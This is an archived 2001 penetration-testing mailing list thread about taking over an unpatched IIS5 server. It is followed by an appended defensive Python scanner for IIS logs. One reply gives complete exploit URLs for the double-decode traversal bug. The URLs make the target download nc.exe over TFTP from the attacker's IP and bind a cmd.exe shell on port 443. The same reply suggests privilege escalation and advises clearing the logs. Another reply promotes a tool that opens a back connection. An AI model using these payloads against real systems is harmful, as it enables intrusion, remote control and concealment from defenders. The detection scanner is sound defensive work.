Penetration Testing mailing list archives

RE: pen testing IIS5


From: "Kevin Timm" <ktimm () stingrey com>
Date: Mon, 25 Jun 2001 21:28:05 -0500

I have a utility to do this at http://invaultech.com. The utility is called
fire runner and it will check several unicode things, upload nc from a
desired location and create a back connection to you. It is built on top of
unicoder, which has the ability to use ssl and proxy servers.
K

-----Original Message-----
From: exceed mekka-symposium [mailto:exceed_ms () hotmail com]
Sent: Sunday, June 24, 2001 2:46 PM
To: pen-test () securityfocus com
Subject: Re: pen testing IIS5


I am pen-testing IIS 5 [no hotfixes] running on WinNT 4.0 with no fixes. At
this point I want to upload a file to the box [nc.exe] and then I will
definitely have the box. How can I go about doing this?


Did you try cgi-decode?

This will upload nc.exe into the target's %SYSTEMROOT%\system32 directory:

http://IIS_IP/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp.exe+-i+your_IP+GET+nc.exe+c:\winnt\system32\nc.exe

This will bind nc.exe to port 443:

http://IIS_IP/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+nc.exe+-L+-p+443+-d+-e+cmd.exe

[notice: links may be broken]

Telnet IIS_IP 443

Voila. :)

Elevate privileges using hk.exe...

Hope this will work.

./exceed

PS: don't forget to clear the logs :)
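Added here as a defender-side illustration, not part of the thread or of either poster's tools: a small Python scanner over constructed IIS W3C-format log lines that flags the double-decoded traversal requests quoted above (plus the overlong-UTF-8 "unicode" variant). The field order, the sample lines and the documentation-range IPs are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C-format log lines (date time c-ip cs-method cs-uri-stem
# cs-uri-query sc-status); the two attack lines mirror the requests quoted in
# the post, and the IPs are documentation-range placeholders, not real hosts.
SAMPLE_LOG = """\
2001-06-24 14:46:01 192.0.2.10 GET /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+tftp.exe+-i+192.0.2.20+GET+nc.exe+c:\\winnt\\system32\\nc.exe 200
2001-06-24 14:46:09 192.0.2.10 GET /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+nc.exe+-L+-p+443+-d+-e+cmd.exe 200
2001-06-24 14:47:00 192.0.2.30 GET /default.htm - 200
2001-06-24 14:47:12 192.0.2.31 GET /images/logo%2520v2.gif - 404
"""

TRAVERSAL = re.compile(r"\.\.[\\/]")
# A two-byte UTF-8 sequence led by C0/C1 is always an overlong encoding of ASCII.
OVERLONG = re.compile(r"%c[01]%[0-9a-f]{2}", re.I)
TOOLS = ("tftp", "nc.exe")

def analyse_request(stem: str, query: str) -> list:
    """Return findings for one request; an empty list means nothing suspicious."""
    findings = []
    once = unquote(stem)   # result of the single decoding pass a server should do
    twice = unquote(once)  # result of the extra pass the vulnerable server does
    if OVERLONG.search(stem):
        findings.append("overlong UTF-8 sequence")
    # Separators that only exist after the second pass (%255c -> %5c -> \) are
    # the signature of the double-decode ("cgi-decode") bug.
    if twice.count("/") + twice.count("\\") > once.count("/") + once.count("\\"):
        findings.append("double-encoded path separator")
    if TRAVERSAL.search(twice):
        findings.append("directory traversal")
    if twice.lower().endswith("cmd.exe"):
        findings.append("cmd.exe reached via web path")
    cmdline = unquote(query).replace("+", " ").lower()
    if any(tool in cmdline for tool in TOOLS):
        findings.append("tftp/nc in command line")
    return findings

def scan_log(text: str) -> list:
    """Return (client_ip, findings) for every flagged request in an IIS log."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 7:
            continue  # header or malformed line
        _date, _time, client, _method, stem, query, _status = parts[:7]
        findings = analyse_request(stem, "" if query == "-" else query)
        if findings:
            hits.append((client, findings))
    return hits
```

The benign `%2520` line shows why the check compares separator counts rather than merely looking for a double-encoded percent sign: double encoding alone is not the signal, a path separator that appears only on the second pass is.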

